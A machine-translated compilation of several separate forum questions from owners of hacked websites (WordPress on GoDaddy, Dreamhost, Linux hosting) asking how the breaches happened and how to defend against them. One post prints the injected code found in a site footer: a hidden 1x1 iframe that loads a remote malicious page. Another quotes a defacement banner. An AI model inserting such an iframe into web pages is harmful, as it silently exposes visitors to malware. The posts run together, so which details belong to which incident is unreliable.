可能重复:
我的服务器被黑了 紧急情况
上周末我公司的网站被黑了。
他们在周五晚上做了最好的事情,所以我们只在周一早上才注意到攻击。有趣的是,我们最近从 Windows 切换到 Linux,因为它应该更稳定和安全。去搞清楚。是的,我们在 Firefox 和 Chrome 上将我们列入黑名单。
由于我不是 Linux 专家,因此我正在寻求有关如何避免将来出现此类问题的建议。您采取了哪些措施来保护您的系统?看起来我们的密码很弱,但是在几次登录失败后,Linux 不应该阻止该帐户吗?他们尝试了 20 多种组合......
除此之外,我正在寻找一种类似于 pingdom 但适用于安全性的工具(或服务)。如果我的网站遭到黑客入侵,请提醒我。有这种事吗?黑客监视器?:)
另一件事,您如何将此类问题通知您的客户?你只是无视并希望没有人注意到吗?电子邮件解释发生了什么?
*以匿名身份发布以避免对我的公司造成更多不良影响,这已经很糟糕了...
最终更新:
过去几周事情一直很平静,让我学到了更多关于网站安全和风险的知识。这是我的故事版本 -
我使用的是旧版本的 wordpress,可能是这个人从 google 上发现了我。我认为这是脚本攻击。很难说安全实际上是如何以及何时受到损害的,我在 2009 年 11 月 5 日注意到了这一点。虽然我当时采取了一些安全措施(如下所述),但总是有可能我错过了重新更改 wordpress 密码的可能性。我格式化了我的工作电脑。
现在我已经从托管中删除了所有不需要的 php 脚本,使管理部分只能对我的 IP 访问,阻止了属于越南的特定 IP 范围。每日备份和其他东西。问题是涉及的变量太多,很难跟踪每个变量。主要课程是为此做好准备。:)
我正在使用 GoDaddy 的共享托管计划并运行 WordPress 网站。我的网站第一次被黑是在 2009 年 11 月 5 日,当时黑客用自己的广告替换了我的广告。我以为这是因为我对安全的懒惰,但我错了。
我格式化了我的电脑并重新设置了一切。将 ESET NOD32 替换为 Microsoft Security Essentials。升级到最新版本的 WordPress。更改了所有密码。设置一个新的数据库。以及我在这里和那里阅读的其他与安全相关的内容。事情运行良好,直到今天我的网站再次遭到黑客攻击。
上次,那家伙玩了很多文件,特意修改了footer.php和所有与广告相关的文件。但这一次他只是走对了地方,替换成了下面的代码——
<IFRAME height=1 src="http://blackberryrss.com/check.html" frameBorder=0 width=1></IFRAME>
<form action="http://www.google.com/cse" id="cse-search-box">
<div>
<input type="hidden" name="cx" value="partner-pub-2815780429722377:hhm6d0-6wfw" />
<input type="hidden" name="ie" value="ISO-8859-1" />
<input type="text" name="q" size="31" />
<input type="submit" name="sa" value="Search" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script> …Run Code Online (Sandbox Code Playgroud) 我想知道这怎么会发生。有人从我所有的域中删除了我的index.php文件,并将他自己的index.php文件与下一条消息放在一起:
通过Z4i0n黑客攻击-致命错误- 2009
[致命错误组BR]
网站desfigurado POR Z4i0n
SOMOS:Elemento_pcx - s4r4d0 - Z4i0n - BELIVE
Gr33tz:W4n73d - M4v3rick -观测- MLK - l3nd4 - Soul_Fly
2009
我的域有很多子域,但只有特定用户可以访问的子域被黑了,其余的不受影响。
我假设有人通过 SSH 进入,因为其中一些子域是空的,而 Google 不知道它们。但是我使用最后一个命令检查了访问日志,但这并没有显示攻击当天通过 SSH 或 FTP 进行的任何活动,7 天前也没有。
我已经更改了密码。你建议我做什么?
我的网站托管在Dreamhost。我想他们安装了最新的补丁。但是,当我查看他们如何进入我的服务器时,我发现了一些奇怪的事情。在我的一个子域中,有许多脚本用于在服务器上执行命令、上传文件、发送大量电子邮件和显示妥协信息。这些文件是从去年 12 月创建的!!
我已经删除了这些文件,我正在寻找更多的恶意文件。
也许安全保留是一个旧的和被遗忘的 PHP 应用程序。此应用程序具有受基于会话的密码系统保护的文件上传表单。其中一个恶意脚本位于上传目录中。这看起来不像是SQL 注入攻击。